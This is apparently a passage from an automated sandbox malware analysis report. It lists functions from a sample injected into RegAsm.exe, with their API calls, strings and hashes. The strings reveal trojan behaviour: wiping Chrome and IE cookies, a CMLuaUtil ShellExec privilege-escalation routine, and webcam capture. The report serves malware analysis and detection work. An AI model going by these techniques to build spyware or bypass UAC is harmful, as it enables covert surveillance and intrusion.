                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                                                                                                                                  Function 004511AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                                                                                                                  • __freea.LIBCMT ref: 0045129D
                                                                                                                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 313313983-2084328917
                                                                                                                                                                                                  • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                                                                                                                  Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                                                                                                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                                                                                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                                  • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                                  • API String ID: 3286818993-122982132
                                                                                                                                                                                                  • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                                                                                                                                                                                  Function 0040BF24 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                                                    • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                                                                                                                  • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                                                                                  • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                                                                                  Function 00456BD3 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                                                                                  Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                  • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                                                  Function 00450F7A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                                                  • _free.LIBCMT ref: 00450FDE
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451032
                                                                                                                                                                                                  • _free.LIBCMT ref: 0045103D
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451048
                                                                                                                                                                                                  • _free.LIBCMT ref: 00451053
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                                                                                  Function 0041119E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                                                                                  • int.LIBCPMT ref: 004111BE
                                                                                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                  • String ID: (mG
                                                                                                                                                                                                  • API String ID: 2536120697-4059303827
                                                                                                                                                                                                  • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                                                  • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                                                                                  Function 0043A3DA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                  • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                                                  • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                                                                                  Function 004075EB Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                                                                                                                                                                                                    • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                                                    • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                                  • API String ID: 3851391207-1839356972
                                                                                                                                                                                                  • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                                                  • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                                                                                  Function 0040BADC Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                                                                                  • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                                                                                  • UserProfile, xrefs: 0040BAE8
                                                                                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                  • API String ID: 2018770650-304995407
                                                                                                                                                                                                  • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                                                  • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                                                                                  Function 004433DA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll$t'`/
                                                                                                                                                                                                  • API String ID: 4061214504-2890722535
                                                                                                                                                                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                                                                                                                  Function 0043AB5C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                                                                                  • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                                                                                  • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                                  • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                                                  • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                                                                                  Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                                                                                                    • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prologSleep
                                                                                                                                                                                                  • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                                                                                  • API String ID: 3469354165-3054508432
                                                                                                                                                                                                  • Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                                                                                                  • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                                                                                                                  Function 0044597A Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
